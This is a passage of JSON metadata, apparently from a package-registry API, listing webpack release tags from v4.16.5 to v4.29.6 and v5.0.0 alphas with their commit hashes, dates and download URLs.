ebpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5